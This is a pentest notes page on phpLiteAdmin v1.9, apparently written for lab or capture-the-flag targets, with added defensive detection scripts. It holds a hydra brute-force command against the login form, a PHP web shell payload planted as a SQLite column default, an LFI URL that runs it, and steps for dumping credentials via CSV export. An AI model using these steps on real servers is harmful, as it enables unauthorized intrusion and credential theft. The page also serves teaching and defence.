# phpLiteAdmin

phpLiteAdmin v1.9 is a web UI for SQLite databases, often found under `/db/` on HTTPS virtual hosts.

**Common path:** `https://TARGET/db/` or `https://TARGET.htb/db/`

***

## Discovery

* Directory bust the HTTPS host (e.g. `gobuster dir -k -u https://TARGET -w ...` or feroxbuster).
* Nikto may report `/db/: This might be interesting` and flag the session cookie (PHPSESSID set without the `secure`/`httponly` flags).
* A PHP warning on the page can leak the filesystem path, e.g. `Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114`.

***

## Default / weak credentials

| Username | Password                                                            |
| -------- | ------------------------------------------------------------------- |
| `admin`  | (often default or weak; try `admin`, `password123`, or brute force) |

**Brute force (HTTPS POST form):**

```bash
hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt TARGET_IP https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -t 3
```

Reference: [Acunetix – phpLiteAdmin default password](https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/)
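The brute-force attempt above is noisy on the server side: every guess is a separate `POST /db/index.php`. The following added example (not from the original page) shows the detection logic a defender would run over the web server access log. It assumes the Apache/nginx "combined" log format; the log lines are constructed samples, and the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (combined log format); not taken from the page.
# 10.10.14.7 fires six POSTs at the login form within three seconds,
# 192.168.1.5 logs in once and later opens the export view.
SAMPLE_LOG = """\
10.10.14.7 - - [12/May/2024:10:00:01 +0000] "GET /db/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2024:10:00:02 +0000] "POST /db/index.php HTTP/1.1" 200 2341 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2024:10:00:02 +0000] "POST /db/index.php HTTP/1.1" 200 2341 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2024:10:00:03 +0000] "POST /db/index.php HTTP/1.1" 200 2341 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2024:10:00:03 +0000] "POST /db/index.php HTTP/1.1" 200 2341 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2024:10:00:04 +0000] "POST /db/index.php HTTP/1.1" 200 2341 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2024:10:00:04 +0000] "POST /db/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.5 - - [12/May/2024:10:05:00 +0000] "POST /db/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.5 - - [12/May/2024:10:09:00 +0000] "GET /db/index.php?view=export HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_login_bursts(lines, path="/db/index.php", threshold=5,
                        window=timedelta(seconds=60)):
    """Return {ip: count} for every source that sent >= threshold POSTs to the
    login path inside any sliding window of the given length.

    A 302 after a run of 200s (the form re-rendered with 'Incorrect password.')
    is the pattern of a guess that finally succeeded, so the count includes
    all POSTs regardless of status.
    """
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == path:
            posts[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        best, start = 0, 0
        for end, ts in enumerate(stamps):
            # advance the window start until it fits within `window` of ts
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, count in detect_login_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"possible brute force from {ip}: {count} login POSTs in one window")
```

The same counting is what a fail2ban-style filter would do; the mitigation the output points at is rate-limiting or lockout on `/db/index.php` and replacing the default `admin` password.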

***

## RCE: Create PHP database + LFI

If you can create a SQLite database through the UI and the server has an LFI that can include files from the directory where the database is written (e.g. `/var/tmp/`):

1. Log in to phpLiteAdmin.
2. Create a new database named `shell.php` or `d.php` (extension must be `.php`).
3. Create a table with one TEXT column and set the default value to PHP code. Use double quotes inside the payload, because the app wraps the default value in single quotes in the generated `CREATE TABLE` statement:\
   `<?php system($_REQUEST["cmd"]); ?>`
4. Example: table name `d`, column `d` type TEXT default `<?php system($_REQUEST["cmd"]); ?>`\
   Resulting SQL:\
   `CREATE TABLE 'd' ('d' TEXT default '<?php system($_REQUEST["cmd"]); ?>')`\
   SQLite stores the `CREATE TABLE` text verbatim in the file's schema table, so the PHP tag ends up in the raw bytes of the `.php` file; that is why including it executes the code.
5. Include the DB file via LFI (adjust path to match server; e.g. DB path `/var/tmp/`):\
   `https://TARGET/manage.php?notes=/validNote/../var/tmp/d.php&cmd=id`

**Exploit walkthrough:** <https://github.com/chacka0101/exploits/blob/master/24044.txt>
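The technique relies on a SQLite file that carries an executable extension and a PHP open tag in its schema text. The following added example (not part of the original page or of phpLiteAdmin) is a defender's scan for exactly that artifact: it walks a directory, identifies SQLite files by their magic header, and reports any that have a PHP-executable extension or contain `<?php`. The fixture it builds uses a harmless marker tag instead of a command-execution payload; the directory layout and file names are constructed for the demo.

```python
import os
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"   # first 16 bytes of every SQLite 3 file
PHP_TAG = b"<?php"
SCAN_LIMIT = 1024 * 1024                # schema text lives on page 1, so 1 MiB is plenty
EXEC_EXTS = (".php", ".phtml", ".phar")  # extensions a typical PHP handler executes


def is_sqlite_file(path):
    """True if the file starts with the SQLite 3 header."""
    with open(path, "rb") as fh:
        return fh.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC


def contains_php_tag(path, limit=SCAN_LIMIT):
    """True if a PHP open tag appears in the first `limit` bytes of the file."""
    with open(path, "rb") as fh:
        return PHP_TAG in fh.read(limit)


def scan_directory(directory):
    """Return a sorted list of (path, reason) for SQLite files that a web server
    could execute as PHP (by extension) or that embed a PHP open tag."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if not is_sqlite_file(path):
                continue
            reasons = []
            if name.lower().endswith(EXEC_EXTS):
                reasons.append("sqlite database with executable extension")
            if contains_php_tag(path):
                reasons.append("php open tag inside sqlite file")
            if reasons:
                findings.append((path, "; ".join(reasons)))
    return sorted(findings)


def make_fixture(directory):
    """Constructed fixture: one clean database and one whose CREATE TABLE text
    carries a (harmless) PHP tag as a column default. SQLite keeps the statement
    verbatim in sqlite_master, so the tag survives in the file bytes."""
    clean = os.path.join(directory, "notes.db")
    con = sqlite3.connect(clean)
    con.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, body TEXT)")
    con.commit()
    con.close()

    bad = os.path.join(directory, "d.php")
    con = sqlite3.connect(bad)
    con.execute("CREATE TABLE d (d TEXT DEFAULT '<?php /* constructed marker */ ?>')")
    con.commit()
    con.close()
    return clean, bad


def demo():
    """Build the fixture in a temp dir and return findings with relative paths."""
    with tempfile.TemporaryDirectory() as tmp:
        make_fixture(tmp)
        return [(os.path.relpath(p, tmp), reason) for p, reason in scan_directory(tmp)]


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Run it against the directory phpLiteAdmin writes databases to (the page's example is `/var/tmp/`). Only `d.php` is reported, and for both reasons; the clean `notes.db` is silent. The fix the finding points at is the same on both sides: keep database files outside any path the LFI or the web server can include, and restrict the names phpLiteAdmin will accept for new databases.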

***

## Export DB as CSV

You can export the SQLite database as CSV from the UI. Use the export view:

`https://TARGET/db/index.php?view=export`

Exported tables may contain credentials (e.g. `users`, `sessions`, or `config` tables). Download or view the CSV and search it for passwords, API keys, or other sensitive data. The export may also leak paths or PHP notices in its output (e.g. `Undefined index: single_table` in `index.php`), which can help with further exploitation.
